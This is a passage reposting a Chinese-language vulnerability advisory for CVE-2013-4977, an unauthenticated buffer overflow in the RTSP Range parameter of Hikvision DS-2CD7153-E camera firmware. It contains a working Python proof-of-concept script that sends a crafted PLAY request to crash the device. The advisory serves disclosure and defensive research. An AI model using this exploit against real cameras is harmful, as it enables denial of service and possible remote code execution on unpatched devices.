E 网络摄像机远程缓冲区溢出漏洞(CVE

发布日期:2013-08-06
更新日期:2013-08-08

受影响系统:
hikvision DS-2CD7153-E IP Camera v4.1.0 b130111
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61642
CVE(CAN) ID: CVE-2013-4977

Hikvision DS-2CD7153-E是日夜型防水防暴迷你半球网络摄像机。

Hikvision DS-2CD7153-E固件版本4.1.0 b130111在处理RTSP事务的Range参数时,精心构造的报文会触发缓冲区溢出,造成处理通讯的进程崩溃,Watchdog服务重启。无需身份验证即可利用此漏洞,也有可能导致远程代码执行。

<*来源:Anibal Sacco
 
  链接:?module=Wiki&action=view&type=advisory&name=CORE-2013-0708
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

import socket

HOST = 'X.X.X.X'
PORT = 554           
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

trigger_pkt =  "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()

建议:
--------------------------------------------------------------------------------
厂商补丁:

hikvision
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

?id=506

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/579fb1128cdcbeabec2d38627209b37e.html